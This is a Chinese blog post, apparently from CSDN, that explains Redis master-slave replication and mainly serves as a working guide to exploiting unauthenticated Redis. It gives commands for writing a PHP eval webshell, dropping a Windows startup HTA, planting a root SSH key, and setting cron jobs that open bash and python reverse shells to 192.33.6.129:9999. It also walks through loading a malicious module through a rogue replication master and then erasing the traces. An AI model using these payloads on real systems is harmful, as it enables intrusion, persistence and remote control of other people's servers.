Redis主从复制

最新推荐文章于 2024-05-16 09:54:28 发布
最新推荐文章于 2024-05-16 09:54:28 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 安全 文章标签: redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45794666/article/details/123118902
版权

Redis主从复制

未授权访问

版本3.2之前都是绑定0.0.0.0:6379所以暴露在公网

3.2之后绑定127.0.0.1相对安全,但是还是无密码可以利用ssrf进行利用(gopher,dict)

利用

注意flushall危险操作,会清空所有缓存数据。

通用

  • 写入webshell

    flushall
set x '<?php eval($_GET["Q"]);?>'
config set dir /var/www/html/upload
config set dbfilename test.php
save
windows

  • 写入自启动文件

    # win10系统管理员自启动目录
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
# win7、win10等系统普通用户下自启动目录
# user:Administrator
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


flushall

set x '<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("calc.exe");</SCRIPT>'

config set dir 'C:\Users\root\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'

config set dbfilename exp.hta

save
linux
  • 写入SSH公钥免密登录
ssh-keygen -t rsa#生成恶意公钥
#写入
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHStzQa4aESwm/Rm/caKPQAblnb6OBCpxpCeahB2WKwnwoT6DuZ1ypzgYTjMEP6BOhySnSatDpdn7wZKUL7ZEaJdSAd0qD/QaHHLFMYvNXrGJQC+9JBvt5X5iUJOx5Ukdu36YXxRib4cw2qhDLnKa2Q96pEInVJcZ02VNxHTvAE+vjhCTQSYPJahin/s/a+IYEcjqyvkiuWVDWg2GMViMwq5Yh/ELZG2KAXNpSNx1TjklXYQVPO2dmPCdUYyy1r+WxEjWLJZPPWQntQc6KiqHmkEGBXGB4fVxScCVR8y2/DEzEqsQcveFWw7mhqfp9kNHP+AOv0wFwL9G8/glZEnGB root@rose\n\n"
save

  • 写入定时任务反弹Shell

    # bash反弹
config set dir /var/spool/cron/
config set dbfilename root
set x '\n\n*/1 * * * * bash -i >& /dev/tcp/192.33.6.129/9999 0>&1\n\n'
save

config set dir /var/spool/cron/
config set dbfilename root
set x '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.33.6.129/9999 0>&1\n\n'
save

# python反弹
config set dir /var/spool/cron/
config set dbfilename root
set x "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.33.6.129\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"
save

什么是主从复制

主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave),数据的复制是单向的,只能由主节点到从节点。

默认情况下,每台Redis服务器都是主节点;且一个主节点可以有多个从节点(或没有从节点),但一个从节点只能有一个主节点

简单来说,主从关系中的两大角色master(主) 和 slave(从) ,为了达到读写分离,规定在主服务器中写(同时同步到从数据库),在从服务器中读。算是一种通过牺牲空间来换取效率的缓解方式。

为什么要用主从复制?

要实现分布式数据库的更大的存储容量和承受高并发访问量,将原来集中式数据库的数据分别存储到其他多个网络节点上。

简单实现

 主 192.168.159.129   安装redis-server和redis-cli并启动
 从 192.168.159.132   安装redis-server并启动

在主redis上执行

redis-cli -h 127.0.0.1 -p 6379
127.0.0.1:6379> slaveof no one
OK
127.0.0.1:6379> set lyy 1
OK
127.0.0.1:6379> get lyy
"1"
127.0.0.1:6379> exit
redis-cli -h 192.168.159.132
192.168.159.132:6379> slaveof 192.168.159.129 6379
OK
192.168.159.132:6379> get lyy
"1"

slaveof命令:设置主从关系,形式为slaveof ip port,其中slaveof no one表示不从属其他机器

注意如果是新版本需要更改配置

protected-mode no

getshell

主从复制getshell的原理就是在redis 4.x-5.x版本中,允许从外部加载.so文件并且将这个文件中代码变成redis功能的一部分,从而实现功能扩展。

可以利用这个功能通过编译恶意的.so文件,并将该文件同步到从属redis上,进行加载,即可实现恶意代码的功能

1.第一步通过未授权或者已知密码去连接服务端redis,建立和自己攻击机的从属关系

我们刚刚在上一步已经实现

2.恶意的so文件使用Dliv3师傅已经编译好的

https://github.com/Dliv3/redis-rogue-server

运行python脚本即可成功利用

python3 redis-rogue-server.py --rhost 192.168.159.132  --rport 6379 --lhost 192.168.159.129 --lport 6379

原理

  1. 自己搭建redis数据库,然后受害者将自己的数据库设置为主节点。

    slaveof x.x.x.x  xx

  2. 设置备份文件名为恶意so文件

    set dir ./
set dbfilename exp.sp

  3. 加载恶意so文件,实现任意命令执行

    module load ./exp.so

  4. 执行命令

    system.exec 'whoami'

  5. 清理痕迹

    config set dbfilename dump.rdb#redis快照文件
system.exec 'rm ./exp.so'
module unload system

优势

redis服务器中不包括除redis服务以外的任何服务时也可以利用,且更加便捷

6ri9ht
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第02篇:Redis主从复制getshell1
08-03
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 1、监听本地1234端口 2、将Redis服务器设置
redis主从复制、哨兵和集群
zjg
11-17 357
redis使用主从复制、哨兵模式、集群
探索Redis安全新纪元:Redis Rogue Server
最新发布
gitblog_00044的博客
05-16 349
探索Redis安全新纪元:Redis Rogue Server 项目地址:https://gitcode.com/n0b0dyCN/redis-rogue-server 在这个数字化时代,数据的安全性至关重要。今天,我们将向您介绍一个令人瞩目的开源项目——Redis Rogue Server,一个针对Redis(<=5.0.5)远程代码执行(RCE)的漏洞利用工具,灵感来源于Redis后渗透...
Redis主从复制getshell技巧
热门推荐
06-10 2万+
Redis未授权漏洞常见的漏洞利用方式: Windows下,绝对路径写webshell 、写入启动项。 Linux下,绝对路径写webshell 、公私钥认证获取root权限 、利用contrab计划任务反弹shell。 基于Redis主从复制的机制,可以通过FULLRESYNC将任意文件同步到从节点(slave),这就使得它可以轻易实现以上任何一种漏洞利用方式,而且存在着...
从Reids漏洞聊到getshell手法,再到计划任务和主从复制原理
milu_Sec的博客
01-07 1081
redis漏洞总结 getshell手法 写文件原理
redis远程备份脚本_Redis主从复制Getshell学习
weixin_34529812的博客
01-31 647
主从复制 Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。部署redis注意:主从复制的利用方式不需要root权限,在6.0.5版本及以后版本中已经修复了该问题。,所以这里要下载6.0.5以下的版本,同...
Redis主从复制问题和扩容问题的解决思路
01-19
为了解决Redis主从Copy的问题,有如下两个解决方案: 主动复制所谓主动复制,就是业务层双写多个Redis,避开Redis自带的主从复制。但是自己干同步,就会产生一致性问题,为了保证主从一致,需要加入一系列的验证机制...
Redis主从复制和集群配置
08-21
Redis主从复制和集群配置说明
Redis主从复制以及主从复制技术原理.docx
10-14
Redis 主从复制技术原理 概述 Redis 是一个开源的使用 ANSI C 语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value 数据库,并提供多种语言的 API。Redis 主从复制是指将一台 Redis 服务器的数据,复制到...
LAMP架构+Redis主从复制.docx
10-08
LAMP架构+Redis主从复制 本文档主要介绍了LAMP架构的安装和配置,以及Redis主从复制的设置。LAMP架构是指Linux操作系统、Apache HTTP服务器、MySQL数据库和PHP编程语言的组合,而Redis则是一个开源的、基于内存的...
redis主从复制原理的深入讲解
12-16
本文主要针对redis主从复制的原理进行了讲解,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧 1.复制过程 2.数据间的同步 3.全量复制 4.部分复制 5.心跳 6.异步复制 1.复制过程 从节点执行 ...
redis getshell方法
00勇士王子的博客
03-07 1679
redis getshell方法总结
redis未授权getshell四种方式
BING
04-24 4154
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
七、利用redis主从复制getshell
dahege666的博客
03-02 1337
一、测试环境 redis主机:kali 192.168.1.138 redis从机:centos7 192.168.1.27 二、测试过程 1.分别安装并开启redis数据库,注意4.X以上需要redis.conf关闭保护模式 2.在kali上连接靶机redis服务,并设置主从状态(将kali设置为redis主机) 3.在kali上编译恶意代码 git clone https...
尝试从redis未授权访问到getshell的四种姿势(失败)
风沙吹奏的博客
09-14 767
尝试从redis未授权访问到getshell的四种姿势(失败) 使用Goby扫描某SRC的C段,发现一个Redis未授权,经验证漏洞存在,故尝试Getshell提高危害(拿更多赏金) 虽然Getshell是失败了,但留个坑在这,以后看看失败的原因。 目录 crontab-计划任务 利用主从复制RCE 通过Web服务写入webshell 写ssh-keygen公钥然后使用私钥登录 1. crontab-计划任务 首先现在自己服务器上监听个端口,例如我这里的8998 nc -lvvp 8998 然后re
redis渗透中的getshell问题总结
Exploit的小站~
05-10 2万+
 0x00 前言 redis现在很多都是直接对外开放端口,从外网无需任何验证即可直接访问到。相关的例子可以从shodan或者zoomeye上找到。那么问题来了,作为一个内存数据库,redis上肯定也有很多敏感信息,比如redis用于做session的存储,可能导致敏感信息泄露。不过最近研究redis从乌云社区和drops上看到有人getshell,思路比较有趣,特地写一下总结。 ...
详解Redis主从复制原理
weixin_48967543的博客
06-30 2020
文章首发于公众号 “蘑菇睡不着” 前言购物优惠券 https://m.cqfenfa.com/ Redis主从复制和 MySQL 差不多,主要起着 数据备份,读写分离等作用。所以说主从复制Redis 来说非常重要,而无论是面试还是工作总,了解 Redis主从复制 底层实现有非常有必要,那么接下来就和大家来看看 Redis 主从复制是怎么实现的吧。 什么是 Redis 主从复制? 在 Redis 中,我们可以通过 SLAVEOF 命令或者 slaveof 选项,让一个服务器去复制另一个服务器...
redis 主从复制
08-12
要在Linux上搭建Redis主从复制,需要按照以下步骤进行操作: 1. 安装Redis:在Linux上安装Redis,可以使用apt-get或yum命令进行安装。 2. 配置Redis主服务器:在Redis主服务器上,需要修改redis.conf配置文件,将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值